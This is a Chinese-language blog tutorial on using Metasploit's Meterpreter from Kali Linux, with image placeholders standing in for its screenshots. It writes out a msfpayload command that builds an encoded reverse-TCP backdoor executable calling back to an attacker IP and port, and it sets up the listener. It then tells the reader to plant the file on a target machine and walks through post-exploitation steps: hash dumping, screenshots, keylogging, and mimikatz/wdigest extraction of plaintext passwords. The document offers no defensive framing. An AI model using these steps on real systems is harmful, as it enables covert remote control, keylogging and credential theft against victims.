kali漏洞利用之Meterpreter介绍

kali漏洞利用之Meterpreter介绍_第1张图片
使用示例:

1.生成Meterpreter后门

命令语句如下,如果其中的IP为kali攻击机的IP地址,后面跟着的是参数。

msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.223 LPORT=2333 R|msfencode -t exe -c 5 > /root/door.exe

 这个语句中,如果不知道参数是什么,可以在metasploit中查看,查看方式如下
 

use exploit/multi/handler

用这个exp来接受返回的链接

kali漏洞利用之Meterpreter介绍_第2张图片
然后查看参数

LHOST是返回的IP地址,也就是我们kali的地址,而LPORT我们设置的是2333,所以也要将其改为2333.

set LPORT 2333

设置好了之后,就可以执行命令了  
kali漏洞利用之Meterpreter介绍_第3张图片
执行成功,可以看到主目录下出现了door.exe文件

然后我们将该door.exe植入到对方的主机上,先不启动,回到metasploit中,设置LHOST为kali的IP地址,然后开启handler
kali漏洞利用之Meterpreter介绍_第4张图片

kali漏洞利用之Meterpreter介绍_第5张图片
这时在本地kali的2333端口上,就在等待一个返回的payload链接

启动靶机上的door.exe,kali就能成功的连接上靶机了

kali漏洞利用之Meterpreter介绍_第6张图片
meterpreter参数可以用help命令打印出来,比如执行sysinfo查看系统信息
kali漏洞利用之Meterpreter介绍_第7张图片
hashdump,抓取哈希
kali漏洞利用之Meterpreter介绍_第8张图片
屏幕截图screenshot
这里写图片描述
键盘记录keyscan_start
这里写图片描述
然后输入keyscandump就可以记录下来在靶机上的输入了

扩展工具
这里写图片描述
例如mimikatz可以用来抓取系统的明文
kali漏洞利用之Meterpreter介绍_第9张图片

wdigest可以获取凭据
kali漏洞利用之Meterpreter介绍_第10张图片
可以看到直接抓取到了密码明文

你可能感兴趣的:(网络攻防)